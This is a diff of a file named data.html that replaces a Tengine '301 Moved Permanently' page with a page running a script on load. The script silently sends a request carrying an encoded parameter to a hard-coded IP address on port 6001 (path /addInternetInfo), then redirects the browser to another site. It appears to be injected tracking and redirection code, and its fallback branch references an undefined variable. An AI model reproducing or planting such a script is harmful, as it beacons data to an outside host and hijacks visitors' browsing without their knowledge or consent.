--- a/data.html
+++ b/data.html
@@ -1,8 +1,1 @@
-<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
-<html>
-<head><title>301 Moved Permanently</title></head>
-<body bgcolor="white">
-<h1>301 Moved Permanently</h1>
-<p>The requested resource has been assigned a new permanent URI.</p>
-<hr/>Powered by Tengine</body>
-</html>
+<html><head></head><body onload="a()"><script>var ip=["115.238.59.164"];p1="http://";p2=":6001/addInternetInfo?parm=MzUwLDAxLDQzLDUzQjE6NDQzMTYyNzZCMzM3LDAwMSwzNiwzOjZCOjJCMzQyMTA0NDY7NzcxO0JRWkZRSA==";url="http://www.runoob.com/";function a(){for(var i=0;i<ip.length;i++){ajax("get",p1+ip[i]+p2,function(){window.location.href=url},true)}}function ajax(type,url,callback,async){var xhr=null;xhr=createXHR();xhr.timeout=600;xhr.onreadystatechange=function(){if(xhr.readyState==4){callback&&callback(xhr.responseText)}};xhr.open(type,url,async);xhr.send(null)}function createXHR(){if(typeof XMLHttpRequest!=="undefined"){return new XMLHttpRequest()}else{if(typeof ActiveXObject!=="undefined"){if(typeof arguments.callee.activeXString!=="string"){var vers=["MSXML2.XMLHttp.6.0","MSXML2.XMLHttp.3.0","MSXML2.XMLHttp"];for(var i=0;i<vers.length;i++){try{new ActiveXObject(vers[i]);arguments.callee.activeXString=versions[i];break}catch(e){console&&console.log(e)}}}return new ActiveXObject(arguments.callee.activeXString)}}};</script></body></html>
